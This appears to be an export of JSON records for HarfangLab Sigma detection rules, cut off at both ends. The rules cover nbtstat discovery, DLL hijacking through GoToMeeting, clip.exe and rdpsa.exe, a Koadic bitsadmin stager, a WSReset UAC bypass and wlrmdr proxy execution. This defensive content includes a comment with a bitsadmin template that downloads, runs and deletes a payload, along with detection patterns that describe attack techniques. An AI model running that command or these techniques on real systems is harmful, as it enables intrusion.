"hl_testing_start_time": "2026-03-23T11:45:34.619750Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/nbtstat.exe-4320B5AED6DC77E8252C0D06A46FB90B.html",
"https://attack.mitre.org/techniques/T1016/"
],
"name": "t1016_nbtstat.yml",
"content": "title: Nbtstat Execution\nid: 92708e1b-412f-421c-999c-476dff6b969d\ndescription: |\n Detects the execution of NBTStat.exe, a tool often used by attackers to display protocol statistics and current TCP/IP connections.\n Attackers may use it during discovery phase to gather informations about the host.\n It is recommended to investigate the parent process for any other suspicious activity.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/nbtstat.exe-4320B5AED6DC77E8252C0D06A46FB90B.html\n - https://attack.mitre.org/techniques/T1016/\ndate: 2022/12/02\nmodified: 2026/02/13\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1016\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.Nbtstat\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - Image|endswith: '\\nbtstat.exe'\n - OriginalFileName: 'nbtinfo.exe'\n\n exclusion_explorer:\n ParentImage:\n - '?:\\Windows\\System32\\cmd.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe'\n - '?:\\Program Files\\PowerShell\\7\\pwsh.exe'\n GrandparentImage: '?:\\Windows\\explorer.exe'\n\n exclusion_gathernetwork:\n ParentCommandLine: '?:\\Windows\\System32\\cmd.exe /c nbtstat -? >> config\\FileSharing.txt'\n GrandparentCommandLine: '?:\\windows\\system32\\cscript.exe ?:\\windows\\system32\\gatherNetworkInfo.vbs'\n\n exclusion_parentimage:\n ParentImage:\n - '?:\\Program Files\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n - '?:\\Program Files\\Sophos\\Sophos Diagnostic Utility\\sducli.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n - '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sducli.exe'\n - '?:\\Program Files (x86)\\\\*\\bin\\xda.service.exe' # Xerox Device Agent\n - '?:\\Program Files (x86)\\ExpressVPN\\expressvpnd\\windows\\xvutil\\XvUtil.exe'\n - '?:\\Program Files (x86)\\Dipisoft\\WakeOnLan\\WakeOnLan.exe'\n - '?:\\program files (x86)\\xerox\\xerox centreware web\\bin\\xerox.cww.discovery.xrxdiscoveryservice.exe'\n - '*\\WakeOnLan397_portable\\WakeOnLan.exe'\n - '?:\\Program Files (x86)\\HEAT Software\\EMSS\\Web\\Services\\ScanEngine\\Engine\\engine.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Program Files\\Goverlan Inc\\GoverlanAgent\\GovAgentx64.exe'\n - '?:\\Program Files\\BMC Software\\BladeLogic\\RSC\\RSCD.exe'\n\n exclusion_grandparentimage:\n GrandparentImage: '?:\\Program Files (x86)\\Common Files\\Pulse Secure\\JUNS\\PulseSecureService.exe'\n\n exclusion_printwayy:\n ParentCommandLine: '?:\\Program Files (x86)\\Southwayy\\PrintWayy\\NetClientService\\Southwayy.PrintWayy.NetClientService.exe'\n\n exclusion_nessus:\n ParentCommandLine|startswith:\n - '?:\\Windows\\System32\\cmd.exe /c echo nbt_* > ?:\\Windows\\temp\\nessus_????????.txt '\n - '?:\\Windows\\System32\\cmd.exe /c echo nbt_* > ?:\\Windows\\TEMP\\nessus_????????.TMP '\n\n exclusion_axiell:\n ParentCommandLine: 'cmd /c nbtstat -n > InfoAxiell.txt'\n GrandparentCommandLine:\n - 'cache -c j -s ?:\\intersystems\\cache\\mgr'\n - 'irisdb -c j -s ?:\\intersystems\\cache\\mgr'\n\n exclusion_ccm:\n - ProcessParentImage: '?:\\Windows\\CCM\\CcmExec.exe'\n - ProcessParentCommandLine|contains: '?:\\WINDOWS\\CCM\\SystemTemp\\\\????????-????-????-????-????????????.ps1'\n ProcessGrandparentImage: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n exclusion_servicenow:\n CommandLine|contains: ' > \\\\\\\\127.0.0.1\\c$\\temp\\\\*\\psscript_output_*.txt 2>&1'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92708e1b-412f-421c-999c-476dff6b969d",
"rule_name": "Nbtstat Execution",
"rule_description": "Detects the execution of NBTStat.exe, a tool often used by attackers to display protocol statistics and current TCP/IP connections.\nAttackers may use it during discovery phase to gather informations about the host.\nIt is recommended to investigate the parent process for any other suspicious activity.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2026-02-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1016"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92771aa1-9e3c-4fc1-b632-4f10e7ce241a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590538Z",
"creation_date": "2026-03-23T11:45:34.590542Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590554Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/@swastik.bhushan/gotomeeting-binary-g2mupload-exe-dll-sideloading-27aa3dbdbce7",
"https://unit42.paloaltonetworks.com/dll-hijacking-techniques/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_gotomeeting.yml",
"content": "title: DLL Hijacking via g2mupload.exe\nid: 92771aa1-9e3c-4fc1-b632-4f10e7ce241a\ndescription: |\n Detects potential Windows DLL Hijacking via g2mupload.exe or g2mupdate.exe related to GoToMeeting software.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://medium.com/@swastik.bhushan/gotomeeting-binary-g2mupload-exe-dll-sideloading-27aa3dbdbce7\n - https://unit42.paloaltonetworks.com/dll-hijacking-techniques/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/03/20\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'G2M.exe'\n ImageLoaded|endswith: '\\g2m.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\GoToMeeting\\'\n - '?:\\Program Files\\Citrix\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\Citrix\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Citrix\\GoToMeeting\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\GoToMeeting\\'\n - '?:\\Program Files\\Citrix\\GoToMeeting\\'\n - '?:\\Program Files (x86)\\Citrix\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\GoToMeeting\\'\n - '?:\\Users\\\\*\\AppData\\Local\\Citrix\\GoToMeeting\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'LogMeIn, Inc.'\n\n filter_legitimate_parent:\n ProcessSigned: 'true'\n ProcessSignature: 'LogMeIn, Inc.'\n ProcessParentImage|endswith: '\\g2mupdate.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92771aa1-9e3c-4fc1-b632-4f10e7ce241a",
"rule_name": "DLL Hijacking via g2mupload.exe",
"rule_description": "Detects potential Windows DLL Hijacking via g2mupload.exe or g2mupdate.exe related to GoToMeeting software.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-03-20",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "927cc2ec-ed2a-488b-8207-882c3e9f8e3e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601862Z",
"creation_date": "2026-03-23T11:45:34.601865Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601888Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_clip.yml",
"content": "title: DLL Hijacking via clip.exe\nid: 927cc2ec-ed2a-488b-8207-882c3e9f8e3e\ndescription: |\n Detects potential Windows DLL Hijacking via clip.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'clip.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Users\\\\*\\AppData\\Roaming\\Zoom\\bin\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "927cc2ec-ed2a-488b-8207-882c3e9f8e3e",
"rule_name": "DLL Hijacking via clip.exe",
"rule_description": "Detects potential Windows DLL Hijacking via clip.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92b99972-5502-4e61-91e1-3c27998b6e2e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.083801Z",
"creation_date": "2026-03-23T11:45:34.083803Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.083807Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin",
"https://github.com/offsecginger/koadic",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/software/S0250/",
"https://attack.mitre.org/software/S0190/"
],
"name": "t1105_koadic_bitsadmin_transfer_stager.yml",
"content": "title: Koadic Bitsadmin Stager Detected\nid: 92b99972-5502-4e61-91e1-3c27998b6e2e\ndescription: |\n Detects the Koadic `stager/js/bitsadmin` stage module which transfers a `.wsf` payload containing JScript over a Bitsadmin job and executes it.\n Koadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.\n It is recommended to investigate the parent process, the content of the `.wsf` payload and other malicious activities stemming from the payload execution.\nreferences:\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/bitsadmin\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/02/15\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1105\n - attack.t1197\n - attack.s0250\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Framework.Koadic\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # bitsadmin /transfer ~ENDPOINT~ /download /priority high ~URL~ %temp%\\~FENDPOINT~ & start /wait %temp%\\~FENDPOINT~ & del %temp%\\~FENDPOINT~\n selection_1:\n - Image|endswith: '\\bitsadmin.exe'\n - OriginalFileName: 'bitsadmin.exe'\n selection_2:\n CommandLine|contains|all:\n - '/transfer ????? '\n - '/download '\n - '/priority high '\n - 'http*/?????.wsf'\n condition: all of selection_*\nlevel: medium\n# level: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92b99972-5502-4e61-91e1-3c27998b6e2e",
"rule_name": "Koadic Bitsadmin Stager Detected",
"rule_description": "Detects the Koadic `stager/js/bitsadmin` stage module which transfers a `.wsf` payload containing JScript over a Bitsadmin job and executes it.\nKoadic, or COM Command & Control, is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.\nIt is recommended to investigate the parent process, the content of the `.wsf` payload and other malicious activities stemming from the payload execution.\n",
"rule_creation_date": "2021-02-15",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1197"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92efbec8-05be-41f7-a0d9-2493f3cfd30f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074316Z",
"creation_date": "2026-03-23T11:45:34.074318Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074323Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html",
"https://github.com/sailay1996/UAC_bypass_windows_store"
],
"name": "t1548_002_uac_bypass_wsreset_dll.yml",
"content": "title: UAC Bypass via Windows Store Executed\nid: 92efbec8-05be-41f7-a0d9-2493f3cfd30f\ndescription: |\n Detects the preparation of a UAC bypass via WSReset.exe.\n WSReset.exe is used to reset the Windows Store cache, and by manipulating its execution, a low-privileged user can bypass UAC and trigger a process with higher privileges.\n Attackers may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the execution context to look for malicious actions and to verify the legitimacy of the loaded DLL.\nreferences:\n - https://heynowyouseeme.blogspot.com/2019/08/windows-10-lpe-uac-bypass-in-windows.html\n - https://github.com/sailay1996/UAC_bypass_windows_store\ndate: 2020/10/23\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: '\\WSReset.exe'\n ImageLoaded|endswith: '\\propsys.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92efbec8-05be-41f7-a0d9-2493f3cfd30f",
"rule_name": "UAC Bypass via Windows Store Executed",
"rule_description": "Detects the preparation of a UAC bypass via WSReset.exe.\nWSReset.exe is used to reset the Windows Store cache, and by manipulating its execution, a low-privileged user can bypass UAC and trigger a process with higher privileges.\nAttackers may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the execution context to look for malicious actions and to verify the legitimacy of the loaded DLL.\n",
"rule_creation_date": "2020-10-23",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92f2f8d2-de43-43d5-ad95-4942e9793588",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594927Z",
"creation_date": "2026-03-23T11:45:34.594931Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_rdpsa.yml",
"content": "title: DLL Hijacking via rdpsa.exe\nid: 92f2f8d2-de43-43d5-ad95-4942e9793588\ndescription: |\n Detects potential Windows DLL Hijacking via rdpsa.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'rdpsa.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\SspiCli.dll'\n - '\\WINSTA.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92f2f8d2-de43-43d5-ad95-4942e9793588",
"rule_name": "DLL Hijacking via rdpsa.exe",
"rule_description": "Detects potential Windows DLL Hijacking via rdpsa.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "92f3e4d7-eb76-471d-956a-c6c46c360779",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077152Z",
"creation_date": "2026-03-23T11:45:34.077154Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077159Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/",
"https://x.com/0gtweet/status/1493963591745220608",
"https://x.com/Oddvarmoe/status/927437787242090496",
"https://x.com/falsneg/status/1461625526640992260",
"https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wlrmdr_proxy_execution.yml",
"content": "title: Proxy Execution via wlrmdr.exe\nid: 92f3e4d7-eb76-471d-956a-c6c46c360779\ndescription: |\n Detects a suspicious process being spawned by wlrmdr.exe.\n Adversaries may abuse wlrmdr.exe, a legitimate Windows system process called the Windows License Reminder, which displays notifications when the operating system is not properly activated, to proxy the execution of their malicious payloads.\n It is recommended to investigate the legitimacy of the process responsible for the execution of wlrmdr.exe and to analyze the detected child process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Wlrmdr/\n - https://x.com/0gtweet/status/1493963591745220608\n - https://x.com/Oddvarmoe/status/927437787242090496\n - https://x.com/falsneg/status/1461625526640992260\n - https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw\n - https://attack.mitre.org/techniques/T1202/\ndate: 2025/10/20\nmodified: 2025/11/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1216.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Wlrmdr\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessParentOriginalFileName: 'wlrmdr.exe'\n\n exclusion_firefox:\n Image|endswith: '\\firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n\n exclusion_chrome:\n Image|endswith: '\\chrome.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Google Inc'\n - 'Google LLC'\n\n exclusion_edge:\n Image|endswith:\n - '\\msedge.exe'\n - '\\msedgewebview2.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_werfault:\n Image:\n - '?:\\Windows\\SysWOW64\\WerFault.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n CommandLine|contains: ' -u -p '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "92f3e4d7-eb76-471d-956a-c6c46c360779",
"rule_name": "Proxy Execution via wlrmdr.exe",
"rule_description": "Detects a suspicious process being spawned by wlrmdr.exe.\nAdversaries may abuse wlrmdr.exe, a legitimate Windows system process called the Windows License Reminder, which displays notifications when the operating system is not properly activated, to proxy the execution of their malicious payloads.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of wlrmdr.exe and to analyze the detected child process.\n",
"rule_creation_date": "2025-10-20",
"rule_modified_date": "2025-11-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1216.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9308cd5d-6872-414a-93c3-1ed4c2a98ff9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
